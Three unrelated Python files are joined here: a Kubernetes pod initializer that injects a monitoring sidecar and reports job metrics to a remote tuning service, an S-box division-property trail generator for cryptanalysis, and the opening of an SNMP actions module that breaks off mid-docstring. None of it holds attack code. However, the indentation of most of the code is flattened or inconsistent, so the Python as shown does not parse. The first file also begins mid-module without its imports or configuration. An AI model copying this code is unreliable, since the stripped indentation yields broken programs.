def k_get(namespace, qry):
'''run kubectl get and return parsed json output'''
# this will raise exception if it fails:
r = subprocess.check_output(["kubectl", "--namespace="+namespace, "get", "--output=json", qry])
r = r.decode('utf-8')
r = json.loads(r)
return r
def k_get_raw(namespace, qry, api="/api/v1"):
'''use kubectl to make a direct API call'''
if namespace:
tgt = "/".join( (api, "namespaces", namespace, qry) )
else:
tgt = "/".join( (api, qry) )
r = subprocess.check_output(["kubectl", "get", "--raw", tgt ] )
r = r.decode('utf-8')
r = json.loads(r)
return r
def k_patch_json(namespace, typ, obj, patchstr):
'''run kubectl 'patch --type=json' (list of patch ops) and return parsed json output'''
# this will raise exception if it fails:
cmd = ["kubectl", "--namespace="+namespace, "patch", "--output=json", "--type=json", typ, obj, "-p", patchstr]
r = subprocess.check_output(cmd)
r = r.decode('utf-8')
r = json.loads(r)
return r
def update1(obj, path1, path2, val):
""" find the earliest subpath in obj starting from path1 that exists and prepare a patch that would make obj contain path1/path2 with a value of 'val'. This also updates obj itself so that a subsequent call will use any sub-structures created by the previous patch(es), so that it works correctly when the patches are applied in order."""
# TODO: this works only for nested dicts for now; to add: arrays and arrays with key value (similar to k8s env array)
# assert path1 exists
tmp = qry(obj, path1)
if tmp is None:
dprint("ERR: no {} in {}".format(path1, repr(obj)))
return # FIXME raise H*ll
p2 = path2.split("/")
if p2[0] == "": p2 = p2[1:] # remove leading /
left = p2[0:-1]
right = p2[-1]
o = val
while left:
t = qry(obj, path1 + "/" + "/".join(left))
if t is not None: # this exists, add to it
tmp = t
break
# not found, go back to higher level
o = { right : o }
right = left[-1]
left = left[0:-1]
# make the update now on our copy of obj, so the next patch 'sees' the newly added elements
tmp[right] = o # adds or replaces it
path = path1 + "/" + "/".join(left+[right])
return { "op" : "add", "path" : path, "value" : o }
def update(obj, adj):
"""prepare updates for a tracked k8s object 'obj', in the form of a patch.
"""
#FIXME: proper handling of settings that don't match the app (e.g., non-existent components, values out of range, etc.)
patches = []
if "state" in adj and "application" in adj["state"]: adj=adj["state"]
containers = obj["spec"]["containers"] # should be present
cmap = { c["name"]:n for n,c in enumerate(containers) }
# patch = [{"op": "remove", "path": "/metadata/initializers/pending/0"}]
comps = adj.get("application",{}).get("components",{})
for cn,c in comps.items():
try:
idx = cmap[cn]
except KeyError:
raise UserError("application has no component '{}'".format(cn))
for sn,s in c.get("settings",{}).items():
if sn in ("mem","cpu"): # update resources
path1 = "/spec/containers/{}".format(idx) # this part should exist
path2 = "resources/limits/"
if sn == "mem": path2 += "memory"
else: path2 += "cpu"
patches.append(update1(obj, path1, path2, s["value"]))
# else: FIXME not implemented - other settings
return patches
def check_and_patch(obj, jobid):
"""Test if the monitored object 'obj' has a pending initializer that matches our initializer name.
If it does, patch it. If the object is one of 'ours', we apply all scheduled changes to it.
If it is not, only the pending initializers list is patched.
This should be called for *every* creation or change of an object with the same type as the one
for which our initializer was configured.
"""
if "initializers" not in obj["metadata"]:
# print(" no initializers", file=sys.stderr) # DEBUG
return
pending = obj["metadata"]["initializers"].get("pending",[])
if not pending:
# print(" initializers empty", file=sys.stderr) # DEBUG
return # empty list
if pending[0]["name"] != INITIALIZER_NAME:
# print(" not our turn, current list:", repr(pending), file=sys.stderr) # DEBUG
return # not our
    # patch the object - ALWAYS apply this, even if not 'our' pod (the initializer config affects ALL namespaces, so we have to update, otherwise pods just won't start)
patch = [{"op": "remove", "path": "/metadata/initializers/pending/0"}]
# if one of 'our' pods, apply other changes that we want
if jobid is not None:
if debug>2: dprint("starting {}".format(obj["metadata"]["name"]))
# inject 'sleeper' process to keep pod active after job exits
# NOTE container name is chosen so it sorts after most 'normal' names,
# not to affect the order of containers in 'containerStatuses' (this works
# with current k8s versions, but may not be future-compatible! Do not
# rely on blind access to containerStatuses[x] - always check the container
# name)
if cfg["sleeper_img"]:
qos = obj["status"]["qosClass"].lower()
uid=obj["metadata"]["uid"]
patch.append({"op":"add",
"path":"/spec/containers/-",
"value" : {
"image": cfg["sleeper_img"] ,
"name": "zzzzmonitor",
"volumeMounts":[{"mountPath":"/rsys", "name":"rsys"}],
"env":[{"name":"OPTUNE_CGROUP_PATH","value":"/kubepods/{qos}/pod{pod}".format(qos=qos,pod=uid)},
{"name":"OPTUNE_SELF_ID", "value":o2id(obj)},
{"name":"REPORT_TARGET", "value":os.environ.get("SELF_IP")}]
#FIXME: get and check self_ip on start, MUST be set
}
})
patch.append({"op":"add", "path":"/spec/volumes/-", "value" : { "name" : "rsys", "hostPath" : {"path":"/sys","type":"Directory"} }})
fake_sleep = False
u = None
while True:
r = send("WHATS_NEXT", jobid, None)
# if not r: error (=None) or no data (={}), assume we got 'measure' (do nothing now, run the job)
if r:
cmd = r["cmd"]
if cmd == "DESCRIBE":
d = query(obj, None) # NOTE no config support for now
d["metrics"] = { "duration": { "unit":"s"}, "est_duration": { "unit":"s"}, "cpu_time" : {"unit":"s"} }
d["metrics"]["perf"] = {"unit":"1/s"} # FIXME - workaround, backend wants something named 'perf'
send("DESCRIPTION", jobid, d) # TODO post to a thread, not to block operation here
continue
elif cmd == "ADJUST":
# prepare updates and add them to the patch
reply = {} # NOTE FIXME: empty data sent, there's a problem with the backend otherwise
try:
u = update(obj, r["param"])
except Exception as x: # TODO: different handling for 'expected' errors vs random Python exceptions
reply = { "status" : "failed", "message":str(x) }
send("ADJUSTMENT", jobid, reply) # expected by the backend
continue
elif cmd == "MEASURE":
break # do nothing, we'll measure at the end. FIXME: no progress reports! (we *could* use the done-at estimate to predict progress and send messages while we wait for the job to run.
elif cmd == "SLEEP": # pretend we did and re-send whats-next, hopefully will not repeat; we can't sleep here
if fake_sleep:
if debug>3: dprint("got 'sleep' twice, ignoring and running pod without changes")
break # did sleep already, move on
if debug>3: dprint("got 'sleep', ignoring")
fake_sleep = True
continue # re-send whats-next
else:
if debug>0: dprint("remote server requested {}, not understood in the current state".format(cmd))
break
else:
# dprint("whats_next req failed, assuming 'measure'")
break
if u: # apply adjustment cmd from server:
patch.extend(u)
patch_str = json_enc(patch)
k_patch_json(obj["metadata"]["namespace"], "pod", obj["metadata"]["name"], patch_str)
def getenv(envarray, key, keyname="name", valname="value"):
"""get a value from a k8s "env" object (array of {"name":x,"value":y}); return None if not found"""
for e in envarray:
if e[keyname] == key:
return e[valname]
return None
def qry(o,q):
"""pick a data item from a nested data structure, based on a filename-like query string
(a simple replacement for tools like jq)"""
try:
for e in q.split("/"):
if not e: continue # skip empty (e.g., leading or duplicate "/")
if e[0] == "[": # special query [q,k,v]: find "k"==q in array of {"k":x,"v":y} items
a = e[1:-1].split(",")
if len(a) == 1: a += ["name","value"]
k,kn,vn = a
# assert a is list
o = getenv(o, k, kn, vn)
elif isinstance(o,dict):
o = o[e]
elif isinstance(o,list):
o = o[int(e)]
else:
# print(e, type(o), o)
raise ValueError
return o
except Exception:
return None
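# Examples (illustrative):
#   qry(pod, "spec/containers/0/name")        -> name of the first container
#   qry(pod, "spec/containers/0/env/[JOBID]") -> value of the JOBID env var, or None
# The "[key]" form searches an array of {"name": ..., "value": ...} items, which is how
# the default cfg["appid"] above extracts the job id from a pod spec.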
def get_jobid(obj):
"""check if the k8s object is one of those we care about and return the configured JOBID
env variable value if so, otherwise return None. The expected object type is 'pod' here,
but this might change.
"""
if obj["metadata"]["namespace"] not in cfg["namespaces"]:
return None
return qry(obj, cfg["appid"])
iso_z_fmt = "%Y-%m-%dT%H:%M:%SZ"
def get_cstatus(pod, c):
if isinstance(c, int): # if index given, find the name
c = pod["spec"]["containers"][c]["name"]
for s in pod["status"]["containerStatuses"]:
if s["name"] == c:
return s
return None # not found
def report(jobid, obj, m):
"""send a 'measure' event for a job completion"""
# d = either data from measure() or {status:failed, message:"..."}
d = { "metrics" : m }
d["annotations"] = {
"resources": json_enc(obj["spec"]["containers"][0].get("resources",{})),
"exitcode" : get_cstatus(obj,0)["state"]["terminated"]["exitCode"] }
send("MEASUREMENT", jobid, d)
def send(event, app_id, d):
post = {"event":event, "param" : d}
if debug>1: dprint("POST", json_enc(post))
# time curl -X POST -H 'Content-type: application/json' -H 'Authorization: Bearer <token>' https://us-central1-optune-saas-collect.cloudfunctions.net/metrics/app1/servo -d @/tmp/payload
r = None
args = {}
if cfg["auth_token"]:
args["headers"] = {"Authorization": "Bearer " + cfg["auth_token"] }
try:
url = cfg["url_pattern"].format(app_id=app_id, acct=cfg["account"])
for retry in (2,1,1):
r = requests.post(url,json=post,timeout=cfg["send_timeout"], **args)
if r.ok: break
if r.status_code != 502 and r.status_code != 503:
break
if debug>3: dprint("rq fail 50x, retry {}".format(retry))
time.sleep(retry) # FIXME: workaround for problem in back-end
if not r.ok: # http errors don't raise exception
if debug>0: dprint("{} {} for url '{}', h={}".format(r.status_code, r.reason, r.url, repr(r.request.headers)))
except Exception as x: # connection errors - note these aren't retried for now
if debug>0: dprint( "POST FAILED: " + str(x) )
if not r:
return None # error
try:
return r.json()
except Exception as x: # no json data
if debug>0: dprint( "JSON PARSE FAILED: " + str(x) + "\n INPUT:" + r.text )
return {}
# track pods that we see entering "terminated" state (used to avoid sending a report more than once); entries are cleared from this map on a DELETED event
g_pods = {}
def report_worker():
while True:
obj = report_queue.get()
report_task(obj)
report_queue.task_done()
# start threads to wait on the queue
g_threads = []
report_queue = queue.Queue()
for t in range(4):
th = threading.Thread(target = report_worker)
th.daemon = True # allow program to exit with the thread still running
th.start()
g_threads.append(th)
def report_task(obj):
"""asynch task called to prepare and send a MEASURE report, this is called
from worker threads to prevent blocking the main loop, because the task
has to: (a) wait enough time to collect the cgroup stats and (b) send
the data over the network.
"""
jobid = get_jobid(obj)
c0state = get_cstatus(obj, 0)["state"]
cc = calendar.timegm(time.strptime(obj["metadata"]["creationTimestamp"], iso_z_fmt))
t = c0state["terminated"]
cs = t["startedAt"]
ce = t["finishedAt"]
if cs is None or ce is None: # terminated, but did not run
send("MEASUREMENT", jobid, {"status":"failed", "message":"job deleted before it ran"})
return
cs = calendar.timegm(time.strptime(cs, iso_z_fmt))
ce = calendar.timegm(time.strptime(ce, iso_z_fmt))
m = { "duration": {"value":ce - cs, "unit":"s"} }
m["perf"] = {"value":1/float(m["duration"]["value"]), "unit":"1/s"} # FIXME - remove when backend stops requiring this
pid = o2id(obj)
rec = g_pods[pid] # shouldn't fail
c = rec["cond"]
with c:
_stats = c.wait_for(lambda: rec.get("_stats"), timeout = 30)
if _stats: # we got a report via the API, add it to the results
cpu_ns = _stats["cpu_time"]
max_usage = _stats["max_usage"] #units?? TBD
m["cpu_time"] = {"value":cpu_ns/1e9, "unit":"s"}
m["max_memory"] = {"value":max_usage, "unit":"bytes"}
else:
if debug>0: dprint("failed to get cgroup pod stats")
try: # "done-at" isn't mandatory
eta = int(obj["metadata"]["annotations"]["done-at"])
m["est_duration"] = {"value":eta - cc, "unit":"s"}
except (KeyError,ValueError):
pass
report(jobid, obj, m)
def watch1(c):
obj = c["object"]
if c["type"] == "ERROR":
return None # likely 'version too old' - trigger restart
# {"type":"ERROR","object":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"too old resource version: 1 (3473)","reason":"Gone","code":410}}
v = obj["metadata"]["resourceVersion"]
if obj["kind"] != "Pod":
        # warn, shouldn't happen
return v
jobid = get_jobid(obj)
if debug>1: dprint("watched obj {}: {}".format(c["type"], obj["metadata"]["name"]))
if c["type"] == "DELETED" and jobid is not None:
g_pods.pop(o2id(obj))
if not c["type"] in ("ADDED", "MODIFIED"):
return v # ignore delete and other changes
check_and_patch(obj, jobid)
# track job completion
if jobid is not None:
pid = o2id(obj)
if pid not in g_pods and "containerStatuses" in obj["status"]:
c0state = get_cstatus(obj, 0)["state"]
if "terminated" in c0state:
job_completed(obj)
#g_pods[pid] = True
#report_queue.put(obj) # send it off to a thread to wait for pod stats and send a report
return v
# global var storing the external 'kubectl' process obj, used to terminate it when
# we get an INTR or TERM signal.
# TODO: temporary, not usable if we run more than one background process
g_p = None
def run_watch(v, p_line):
api = "/api/v1" # FIXME (ok with current k8s, but switch to api groups later)
qry = "pods?includeUninitialized=true&watch=1&resourceVersion="+str(v)
tgt = "/".join( (api, qry) )
cmd = ["kubectl", "get","--request-timeout=0", "--raw", tgt ]
stderr = [] # collect all stderr here FIXME: maybe don't collect stderr?
stdin = b'' # no stdin
proc = subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    global g_p  # declare the module-level handle so intr() can terminate this process
    g_p = proc
wi = [proc.stdin]
ei = [proc.stdin, proc.stdout,proc.stderr]
eof_stdout = False
eof_stderr = False #
while True:
r,w,e = select.select([proc.stdout,proc.stderr], wi, ei )
if eof_stdout and eof_stderr and proc.poll() is not None: # process exited and no more data
break
for h in r:
if h is proc.stderr:
l = h.read(4096) # noqa: E741 (l as in line)
if not l:
eof_stderr = True
continue
stderr.append(l)
else: # h is proc.stdout
l = h.readline() # noqa: E741 (l as in line)
if not l:
eof_stdout = True
continue
stdout_line = l.strip().decode("UTF-8") # there will always be a complete line, driver writes one line at a time
if debug>4: dprint('STDOUT:', stdout_line) # DEBUG FIXME
if not stdout_line:
continue # ignore blank lines (shouldn't be output, though)
try:
stdout = json.loads(stdout_line)
except Exception as x:
proc.terminate()
# TODO: handle exception in json.loads?
raise
v = p_line(stdout)
if v is None: return 1, v # failure - return to trigger a new 'get' of all pods
if w:
# write with select.PIPE_BUF bytes or less should not block
l = min(getattr(select,'PIPE_BUF',512), len(stdin)) # noqa: E741 (l as in line)
if not l: # done sending stdin
proc.stdin.close()
wi = []
ei = [proc.stdout,proc.stderr]
else:
proc.stdin.write(stdin[:l])
stdin = stdin[l:]
# if e:
rc = proc.returncode
g_p = None
    if rc == 1 and len(stderr) == 1 and b"unexpected EOF" in stderr[0]:  # stderr chunks are bytes
return 0, v # this is OK, it times out after 5 minutes
if debug>0: dprint("kubectl exited, code=", rc) # DEBUG
if debug>1:
stderr = "".join(stderr)
dprint(stderr)
send("DIAG", "_global_", {"account":cfg["account"], "reason":"kubectl watch", "stderr": stderr[:2000]})
return rc, v
def watch():
pods = k_get_raw("", "pods?includeUninitialized=true")
for p in pods.get("items", []): # should exist?
jobid = get_jobid(p)
if jobid is None:
if debug>3: dprint("existing other obj: {}".format(p["metadata"]["name"])) # DEBUG
else:
if debug>3: dprint("existing job obj: {}".format(p["metadata"]["name"])) # DEBUG
check_and_patch(p, jobid)
v = pods["metadata"]["resourceVersion"]
if debug>3: print("INFO: watch",v)
while True:
r, v = run_watch(v, watch1)
if r:
return # exit (we'll be restarted from scratch - safer than re-running watch, in case of an error)
if debug>3: dprint ("INFO: resubmit watch", v)
def intr(sig_num, frame):
# if we want to kill(0,sig) from the handler:
signal.signal(sig_num, signal.SIG_DFL)
if g_p:
g_p.terminate()
send("GOODBYE", "_global_", {"account":cfg["account"], "reason":"signal {}".format(sig_num)})
if http_server:
http_server.shutdown()
# http_server.close() # ? needed
os.kill(0, sig_num) # note this loses the frame where the original signal was caught
# or sys.exit(0)
# ===
# bits from servo-k8s
def numval(v,min,max,step=1):
"""shortcut for creating linear setting descriptions"""
return {"value":v,"min":min,"max":max, "step":step, "type": "range"}
def cpuunits(s):
'''convert a string for CPU resource (with optional unit suffix) into a number'''
if s[-1] == "m": # there are no units other than 'm' (millicpu)
return ( float(s[:-1])/1000.0 )
else:
return (float(s))
# valid mem units: E, P, T, G, M, K, Ei, Pi, Ti, Gi, Mi, Ki
mumap = {"E":1000**6, "P":1000**5, "T":1000**4, "G":1000**3, "M":1000**2, "K":1000,
"Ei":1024**6, "Pi":1024**5, "Ti":1024**4, "Gi":1024**3, "Mi":1024**2, "Ki":1024}
def memunits(s):
'''convert a string for memory resource (with optional unit suffix) into a number'''
for u,m in mumap.items():
if s.endswith(u):
return ( float(s[:-len(u)]) * m )
return (float(s))
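# Illustrative conversions for the two helpers above (a sketch, not an exhaustive list):
#   cpuunits("250m")  -> 0.25           # millicpu suffix
#   cpuunits("2")     -> 2.0
#   memunits("512Mi") -> 536870912.0    # 512 * 1024**2
#   memunits("1G")    -> 1000000000.0   # decimal unit
#   memunits("4096")  -> 4096.0         # bare number passes through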
def query(obj,desc=None):
"""create a response to 'describe' cmd from k8s pod desc and optional custom properties desc """
    # This is a simplified version of what the k8s servo has (single container only); if we
    # change it to multiple containers, they will become the app's components (here the app is
    # a single pod, unlike servo-k8s where 'app' means a k8s deployment).
if not desc:
desc = {"application":{}}
elif not desc.get("application"):
desc["application"] = {}
comps = desc["application"].setdefault("components", {})
c = obj["spec"]["containers"][0]
cn = c["name"]
comp=comps.setdefault(cn, {})
settings = comp.setdefault("settings", {})
r = c.get("resources")
if r:
settings["mem"] = numval(memunits(r.get("limits",{}).get("memory","0")), 0, MAX_MEM, MEM_STEP) # (value,min,max,step)
settings["cpu"] = numval(cpuunits(r.get("limits",{}).get("cpu","0")), 0, MAX_CPU, CPU_STEP) # (value,min,max,step)
for ev in c.get("env",[]):
# skip env vars that match the pre-defined setting names above
if ev["name"] in ("mem","cpu","replicas"):
continue
if ev["name"] in settings:
s = settings[ev["name"]]
if s.get("type", "linear") == "linear":
try:
s["value"] = float(ev["value"])
except ValueError:
raise ConfigError("invalid value found in environment {}={}, it was expected to be numeric".format(ev["name"],ev["value"]))
else:
s["value"] = ev["value"]
return desc
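# Illustrative descriptor returned by query() for a single-container pod (a sketch; the
# container name "main" and the resource values below are made-up):
#   {"application": {"components": {"main": {"settings": {
#       "mem": {"value": 536870912.0, "min": 0, "max": MAX_MEM, "step": MEM_STEP, "type": "range"},
#       "cpu": {"value": 0.5,         "min": 0, "max": MAX_CPU, "step": CPU_STEP, "type": "range"}
#   }}}}}
# Container env vars other than mem/cpu/replicas are merged into "settings" as well.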
def o2id(obj):
# FIXME: encode self ID (for now, just the pod UID)
return obj["metadata"]["uid"]
def job_completed(obj):
#
pid = o2id(obj)
c = threading.Condition()
g_pods[pid] = { "cond" : c }
# TODO: consider saving pid in obj[_pid], in case o2id() is slow
report_queue.put(obj) # send it off to a thread to wait for pod stats and send a report
# with c:
# c.notify()
def handle_cgroup_stats(data):
# dprint("got post with stats", repr(data))
pid = data.get("id", None)
if not pid:
# invalid input if no 'id', ignore it silently
# dprint("no ID", pid)
return
r = g_pods.get(pid, None)
if not r:
# dprint("no match for", pid)
# error, we do not expect report before g_pods is updated
return
c = r["cond"]
with c:
r["_stats"] = data["stats"]
c.notify()
# === server for receiving stats from sidecar container
http_server = None
http_thread = None
class Handler(http.server.BaseHTTPRequestHandler):
"""this handler answers to POST on any URL, only the input data is used. Data
should be in JSON format and contain { "id":string, "stats":{stats} }"""
def do_POST(self):
cl = self.headers.get("Content-length","") # should be present - or else
try:
cl = int(cl) # will fail if the header is empty
except ValueError:
self.send_error(400, message="bad request",explain="content-length is missing or invalid")
return
        data = self.rfile.read(cl)  # read exactly Content-Length bytes (a bare read() may block)
        try:
            data = json.loads(data)
        except Exception as x:
            self.send_error(400, message="bad request", explain="could not parse input as JSON data: "+str(x))
            return
        handle_cgroup_stats(data)
self.send_error(204) # instead of 200, no body needed
# self.end_headers() - called by send_error()
def log_request(self, code='-', size='-'):
pass # do nothing
def log_error(self, format, *args):
pass
def version_string(self):
return "OptuneStatsPost/1.0"
class TServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
pass
def run_server():
    global http_server, http_thread  # publish the handles so the signal handler can shut the server down
    s = TServer(('',8080),Handler)
    s.daemon_threads = True
    thread = threading.Thread(target=s.serve_forever)
    http_server = s
    http_thread = thread
thread.start()
return s, thread
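# Illustrative request the stats sidecar is expected to POST to this server (a sketch inferred
# from Handler and handle_cgroup_stats; only cpu_time's unit (nanoseconds) is confirmed by the
# code above, max_usage is forwarded as-is with its unit marked TBD):
#   POST http://<servo-pod>:8080/   (any path)
#   { "id": "<pod uid as returned by o2id()>",
#     "stats": { "cpu_time": 3700000000, "max_usage": 104857600 } }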
# ===
if __name__ == "__main__":
signal.signal(signal.SIGTERM, intr)
signal.signal(signal.SIGINT, intr)
run_server()
# dprint(repr(cfg)) #DEBUG
send("HELLO", "_global_",{"account":cfg["account"]}) # NOTE: (here and in other msgs) acct not really needed, it is part of the URL, to be removed
try:
watch()
send("GOODBYE", "_global_", {"account":cfg["account"], "reason":"exit" }) # happens if we missed too many events and need to re-read the pods list; TODO: handle this internally without exiting
except Exception as x:
import traceback #DEBUG
traceback.print_exc() #DEBUG
send("GOODBYE", "_global_", {"account":cfg["account"], "reason":str(x) })
# TODO send pod uuid (catch duplicates)
|
GenInt.py
|
from .Polynomial import *
from .Sbox import *
from .Term import *
from .Vector import *
from multiprocessing import Process, Lock
from threading import Thread
#from pudb import set_trace; set_trace()
class GenInt(object):
def __init__(self, values, inputLength, outputLength ):
self.probability_bit = 0
self.mutex = Lock()
self.trails = dict()
self.inputLength = inputLength
self.outputLength = outputLength
self.sbox = Sbox(values, inputLength, outputLength)
self.possible_pattern = []
self.impossible_pattern = []
self.__genPatterns()
def getTrails(self):
if not self.trails:
self.__genSboxTrails()
return self.trails
def __genImp_from_pos(self, possibleList):
full_list = [ Vector( self.outputLength, x) for x in range(1 << self.outputLength)]
return list( set(full_list) - set(possibleList) )
def __genPatterns(self):
if not self.trails:
self.__genSboxTrails()
for vec_in in self.trails: # vec_in is a Vector
impossibleList = self.__genImp_from_pos( self.trails[vec_in] )
for vec_out in self.trails[vec_in]:
self.possible_pattern.append( ( vec_in + vec_out ).toList() )
for vec_out in impossibleList:
self.impossible_pattern.append( ( vec_in + vec_out ).toList() )
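    # Note on the data produced above (a sketch; it assumes Vector.toList() returns one entry
    # per bit): every pattern is the input division-property vector concatenated with an output
    # vector, so for a 4x4 S-box each entry is an 8-element 0/1 list. impossible_pattern holds,
    # for each input vector, the complement of its possible output set.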
def __genSboxTrails(self):
polys = self.sbox.getPolynomilas()
(in_dim, out_dim) = self.sbox.getDimension()
poly_to_check = []
for outVec in range(0, 1 << in_dim ):
poly_to_check.append( self.__multiply_by_vec( polys, outVec, Polynomial('1', in_dim) ) )
self.trails[ Vector(out_dim, 0 ) ] = [ Vector(out_dim, 0) ]
threads = []
for inputVec in range(1, 1 << in_dim):
threads.append( Thread( target = self.__genSet_from_inputVec, args = (inputVec, poly_to_check, in_dim, out_dim, polys ) ) )
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def __genSet_from_inputVec( self, inputVec, poly_to_check, in_dim, out_dim, polys ):
outUnknown = []
vec = Vector( in_dim, inputVec )
in_vectorSet = vec.getCoveringVectors()
for outVec in range(1, 1 << out_dim):
            # This check runs on every loop iteration and is the bottleneck; these polynomials could be precomputed.
if poly_to_check[outVec].containTermSet(in_vectorSet, in_dim):
outUnknown.append( Vector( out_dim, outVec ) )
outUnknown = self.__deleteRedundancy( outUnknown )
outUnknown.sort()
self.mutex.acquire()
self.trails[vec] = outUnknown
self.mutex.release()
def __deleteRedundancy(self, vectors):
assert isinstance(vectors, list)
for v in vectors:
set_sub = v.getCoveringVectors()
set_sub.remove( v )
if set_sub:
vectors = set(vectors) - set( set_sub )
return list(vectors)
def __multiply_by_vec(self, beControledList, conVec, e ):
dim = len(beControledList)
assert 0 <= conVec < (1 << dim)
res = e
for i in range(dim):
if conVec >> (dim - 1 - i) & 1:
res *= beControledList[i]
return res
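# Illustrative behaviour of GenInt.__multiply_by_vec (a sketch): the bits of conVec select,
# MSB-first, which entries of beControledList get multiplied into e. With dim == 3 and
# conVec == 0b101 the result is e * beControledList[0] * beControledList[2].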
def main():
#sbox = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 ]
sbox = [ 12, 5, 6, 11 , 9, 0, 10, 13, 3, 14, 15, 8, 4, 7, 1, 2 ]
#
#sbox = [ 0x6, 0x5, 0xC, 0xA, 0x1, 0xE, 0x7, 0x9, 0xB, 0x0, 0x3, 0xD, 0x8, 0xF, 0x4, 0x2 ]
genInt = GenInt(sbox, 4, 4)
for x in genInt.possible_pattern:
print (x)
for x in genInt.impossible_pattern:
print (x)
print( len(genInt.possible_pattern ) )
print( len(genInt.impossible_pattern ) )
#for x in t:
# print ( str(x), [str(i) for i in t[x] ] )
if __name__ == '__main__':
main()
|
common_snmp_actions.py
|
'''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""
Implementation of the standard SNMP protocol commands for SNMP v1, v2c and v3,
with IPv6 support.
SNMP v3 Trap and Inform support added.
"""
import re
import ast
import Framework.Utils as Utils
from Framework.ClassUtils.snmp_utlity_class import WSnmp as ws
from Framework.Utils import testcase_Utils, config_Utils, data_Utils, snmp_utils
from threading import Thread
from time import sleep
import socket
import Queue
try:
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp.smi import builder, view, compiler, rfc1902, error
except ImportError:
testcase_Utils.pNote("Please Install PYSNMP 4.3.8 or Above", "error")
class CommonSnmpActions(object):
"""
Class for standard SNMP protocol commands
"""
def __init__(self):
"""
        This is the initialization
"""
self.resultfile = Utils.config_Utils.resultfile
self.datafile = Utils.config_Utils.datafile
self.logsdir = Utils.config_Utils.logsdir
self.filename = Utils.config_Utils.filename
self.logfile = Utils.config_Utils.logfile
self.snmpver = {'1':'0', '2':'1', '2c':'1', '3':'2'}
def snmp_get(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None,
custom_mib_paths=None,
load_mib_modules=None):
"""
snmp_get uses the SNMP GET request to query for information on a
network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
        2. snmp_ver: SNMP version; supported values are 1 (v1), 2 or 2c (v2c) and 3 (v3)
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7.system_name(string) = Name of the system from the input datafile
        8.snmp_timeout: Number of seconds the SNMP manager will wait for a
          response from the SNMP Agent. For SNMP walk this may need to
          be set higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of
this USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
